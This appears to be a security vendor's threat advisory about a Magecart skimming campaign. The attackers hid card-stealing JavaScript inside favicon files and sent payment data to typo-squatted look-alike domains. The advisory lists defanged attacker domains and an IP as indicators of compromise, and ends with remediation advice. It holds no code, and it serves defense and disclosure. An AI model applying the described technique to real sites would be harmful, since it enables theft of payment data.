Rewterz Threat Alert – Water Nue Phishing Targets C-Suite’s Office 365 Accounts
August 10, 2020Rewterz Threat Advisory – CVE-2020-7298 – McAfee Total protection security bypass
August 10, 2020Rewterz Threat Alert – Water Nue Phishing Targets C-Suite’s Office 365 Accounts
August 10, 2020Rewterz Threat Advisory – CVE-2020-7298 – McAfee Total protection security bypass
August 10, 2020Severity
High
Analysis Summary
A Magecart skimming campaign is found leveraging homoglyph attack techniques. The hackers targeted visitors of several sites using typo-squatted domain names, and modified favicons to inject software skimmers used to steal payment card information. Researchers identified the exfiltration gateway, which appeared to be a slight variation of a legitimate domain name based on the usage of a “q” character in place of what should have been a “p”. One of the interesting characteristics of this sample compared to other Inter skimming kits was that it was in a .ico file format instead of HTML or JavaScript. The injected favicon was a copy of the legitimate favicon. Inside the malicious file is JavaScript code identified to be Magecart skimming code that gathers credit card and billing information. Multiple other victim sites and their associated look-alike domains were identified as being tied to this campaign. Infrastructure overlaps indicate that this activity is likely tied to Magecart Group 8.
Impact
- Theft of sensitive information
- Financial theft
Indicators of Compromise
Domain Name
- zoplm[.]com
- winqsupply[.]com
- fleldsupply[.]com
- cigarpaqe[.]com
Source IP
- 51[.]83[.]209[.]11
Remediation
- Block the threat indicators at their respective controls.
- Always double check for spelling mistakes in domain names.
- Type your intended domain name instead of clicking on links.